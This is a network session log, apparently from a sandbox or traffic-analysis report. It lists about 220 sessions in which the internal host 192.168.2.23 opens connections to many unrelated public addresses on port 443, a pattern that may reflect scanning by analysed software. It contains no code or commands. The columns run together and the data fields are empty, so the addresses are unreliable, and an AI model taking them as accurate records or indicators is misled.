                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27507192.168.2.2338724159.148.164.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27508192.168.2.235912425.54.45.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27509192.168.2.2352800196.87.179.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27510192.168.2.2358136155.171.176.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27511192.168.2.2352206155.85.96.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27512192.168.2.2344770202.245.233.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27513192.168.2.234409841.211.34.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27514192.168.2.235523293.192.103.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27515192.168.2.2356148167.21.152.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27516192.168.2.235708853.13.209.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27517192.168.2.2353018156.52.73.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27518192.168.2.2350260151.175.41.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27519192.168.2.2347952201.31.0.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27520192.168.2.234147095.250.89.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27521192.168.2.235545482.206.87.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27522192.168.2.2347870198.14.49.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27523192.168.2.2347828124.33.30.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27524192.168.2.2341362220.167.9.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27525192.168.2.233539277.36.29.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27526192.168.2.2342096116.102.79.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27527192.168.2.233525637.178.23.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27528192.168.2.2333582186.55.230.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27529192.168.2.2347420115.163.248.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27530192.168.2.2359190133.13.91.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27531192.168.2.2359806104.142.53.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27532192.168.2.235898493.66.80.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27533192.168.2.2356432171.119.9.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27534192.168.2.235828835.49.86.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27535192.168.2.234378018.169.160.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27536192.168.2.236045486.172.160.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27537192.168.2.2344888212.110.33.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27538192.168.2.23405588.116.11.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27539192.168.2.235605680.169.2.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27540192.168.2.233695274.222.146.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27541192.168.2.2340040161.99.207.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27542192.168.2.23407661.214.87.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27543192.168.2.235932667.154.65.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27544192.168.2.234261250.105.183.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27545192.168.2.2350240119.142.64.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27546192.168.2.2357336219.66.231.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27547192.168.2.234479690.4.106.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27548192.168.2.2334128146.101.21.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27549192.168.2.2336478217.240.117.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27550192.168.2.2358902102.32.28.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27551192.168.2.2357838132.133.55.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27552192.168.2.233628858.28.30.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27553192.168.2.234060699.78.186.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27554192.168.2.2339630172.177.226.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27555192.168.2.2333074190.145.130.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27556192.168.2.234022427.191.198.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27557192.168.2.2351608158.14.183.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27558192.168.2.2351950153.64.44.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27559192.168.2.235527098.144.155.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27560192.168.2.2340744218.22.126.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27561192.168.2.233583617.134.76.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27562192.168.2.2347906186.71.93.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27563192.168.2.233786649.23.59.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27564192.168.2.2343966182.125.55.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27565192.168.2.2342636152.187.172.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27566192.168.2.2340330157.39.106.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27567192.168.2.2344484155.17.132.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27568192.168.2.2338008107.243.213.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27569192.168.2.2346550185.115.233.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27570192.168.2.234092027.83.204.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27571192.168.2.234416849.13.153.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27572192.168.2.2353676219.164.110.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27573192.168.2.2348964147.141.174.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27574192.168.2.2334308190.179.92.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27575192.168.2.2359518123.191.29.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27576192.168.2.233568251.181.228.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27577192.168.2.2359660122.26.11.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27578192.168.2.234387459.42.26.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27579192.168.2.235340270.96.10.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27580192.168.2.2347852104.64.28.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27581192.168.2.2337154108.218.54.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27582192.168.2.2349498194.94.124.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27583192.168.2.235158053.58.61.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27584192.168.2.233678061.197.228.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27585192.168.2.233935657.16.167.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27586192.168.2.2336302131.3.197.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27587192.168.2.2333740216.63.28.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27588192.168.2.23469162.244.211.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27589192.168.2.2354476190.37.100.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27590192.168.2.2359794188.32.8.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27591192.168.2.2358072216.14.121.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27592192.168.2.2354984187.66.42.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27593192.168.2.2356508174.163.2.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27594192.168.2.234652642.24.167.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27595192.168.2.234114286.227.170.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27596192.168.2.2356014197.253.191.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27597192.168.2.234686082.208.207.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27598192.168.2.235101452.170.116.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27599192.168.2.2350060196.47.153.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27600192.168.2.2343586167.95.182.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27601192.168.2.233294469.36.69.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27602192.168.2.2336870157.145.70.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27603192.168.2.2334644211.42.117.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27604192.168.2.2346812114.205.175.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27605192.168.2.2336494164.12.103.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27606192.168.2.23487869.247.189.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27607192.168.2.2347894125.215.90.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27608192.168.2.2343596217.222.8.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27609192.168.2.2354992107.161.54.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27610192.168.2.2352386139.216.48.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27611192.168.2.2337988145.87.22.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27612192.168.2.2341496156.185.55.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27613192.168.2.234321224.115.218.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27614192.168.2.2333454209.242.47.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27615192.168.2.2351212221.189.246.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27616192.168.2.2358886100.14.214.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27617192.168.2.233370670.174.140.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27618192.168.2.2334008217.233.137.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27619192.168.2.235271060.60.135.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27620192.168.2.233485476.13.45.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27621192.168.2.233713493.178.192.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27622192.168.2.235575687.71.38.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27623192.168.2.234119668.217.89.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27624192.168.2.233545457.43.161.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27625192.168.2.235836025.17.136.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27626192.168.2.2344566157.5.253.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27627192.168.2.2349508219.86.44.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27628192.168.2.233823260.206.98.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27629192.168.2.2359468211.42.197.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27630192.168.2.234934244.13.172.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27631192.168.2.233596280.191.165.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27632192.168.2.233676217.196.240.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27633192.168.2.2333798219.122.159.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27634192.168.2.235248046.57.235.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27635192.168.2.2349102188.211.151.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27636192.168.2.2348288159.111.252.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27637192.168.2.235269431.33.78.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27638192.168.2.234753883.137.39.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27639192.168.2.2344094223.157.162.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27640192.168.2.2356350150.156.222.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27641192.168.2.233298462.163.67.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27642192.168.2.2343572166.55.160.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27643192.168.2.2349360157.145.87.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27644192.168.2.2351544122.22.110.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27645192.168.2.2356750197.69.247.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27646192.168.2.234771614.11.65.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27647192.168.2.233969243.157.125.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27648192.168.2.2360732211.252.39.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27649192.168.2.2340286138.53.83.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27650192.168.2.2356014204.94.73.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27651192.168.2.2351228209.66.188.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27652192.168.2.234185246.207.250.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27653192.168.2.2358788112.130.229.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27654192.168.2.2349598218.28.24.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27655192.168.2.235719036.113.29.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27656192.168.2.233436652.15.99.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27657192.168.2.234030466.7.121.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27658192.168.2.233536298.125.48.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27659192.168.2.2353012101.166.230.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27660192.168.2.234822041.213.133.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27661192.168.2.2336670216.117.143.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27662192.168.2.2337246209.246.112.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27663192.168.2.23396605.166.23.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27664192.168.2.234192683.111.25.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27665192.168.2.2343706198.254.83.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27666192.168.2.2347022223.207.254.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27667192.168.2.233827050.45.250.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27668192.168.2.2333260179.9.220.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27669192.168.2.2341016164.13.167.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27670192.168.2.234583072.57.41.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27671192.168.2.2336242143.37.165.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27672192.168.2.2347304201.230.206.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27673192.168.2.2336002175.155.155.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27674192.168.2.2349306129.153.31.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27675192.168.2.2340682160.26.6.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27676192.168.2.2332990130.51.185.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27677192.168.2.2339630198.183.51.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27678192.168.2.235916832.136.5.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27679192.168.2.2358344198.168.72.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27680192.168.2.2334600160.109.56.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27681192.168.2.2338174122.222.176.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27682192.168.2.234065820.187.222.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27683192.168.2.233721296.74.192.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27684192.168.2.2334896165.254.228.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27685192.168.2.2355812122.44.50.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27686192.168.2.2349808160.3.220.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27687192.168.2.2355930106.143.118.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27688192.168.2.235256447.74.91.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27689192.168.2.233814679.219.47.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27690192.168.2.233703634.157.123.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27691192.168.2.2346610135.5.12.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27692192.168.2.2350188162.79.19.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27693192.168.2.2336968111.74.6.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27694192.168.2.234104677.142.89.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27695192.168.2.235774238.85.242.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27696192.168.2.2337390117.214.235.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27697192.168.2.2342250118.174.8.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27698192.168.2.23587321.126.121.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27699192.168.2.234655277.47.24.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27700192.168.2.2333082196.98.133.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27701192.168.2.2341400205.116.53.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27702192.168.2.23333808.153.74.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27703192.168.2.2337460106.55.99.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27704192.168.2.233696836.25.35.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27705192.168.2.234872070.103.246.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27706192.168.2.236040280.215.6.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27707192.168.2.233687652.119.4.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27708192.168.2.234379065.54.14.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27709192.168.2.2336460135.187.54.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27710192.168.2.2335212172.97.24.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27711192.168.2.2360806106.78.245.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27712192.168.2.235618299.198.250.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27713192.168.2.2353080135.107.66.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27714192.168.2.2335756174.204.195.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27715192.168.2.2356656169.70.121.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27716192.168.2.2351790193.255.80.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27717192.168.2.2355646101.182.148.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27718192.168.2.2341126196.218.180.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27719192.168.2.2353056169.18.120.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27720192.168.2.234373259.95.121.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27721192.168.2.235003284.204.222.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27722192.168.2.2345928203.253.168.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27723192.168.2.235027414.220.105.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27724192.168.2.2340614180.114.46.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27725192.168.2.2352962152.33.247.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27726192.168.2.234978091.33.21.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27727192.168.2.2345234177.149.176.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27728192.168.2.235891683.153.135.89443
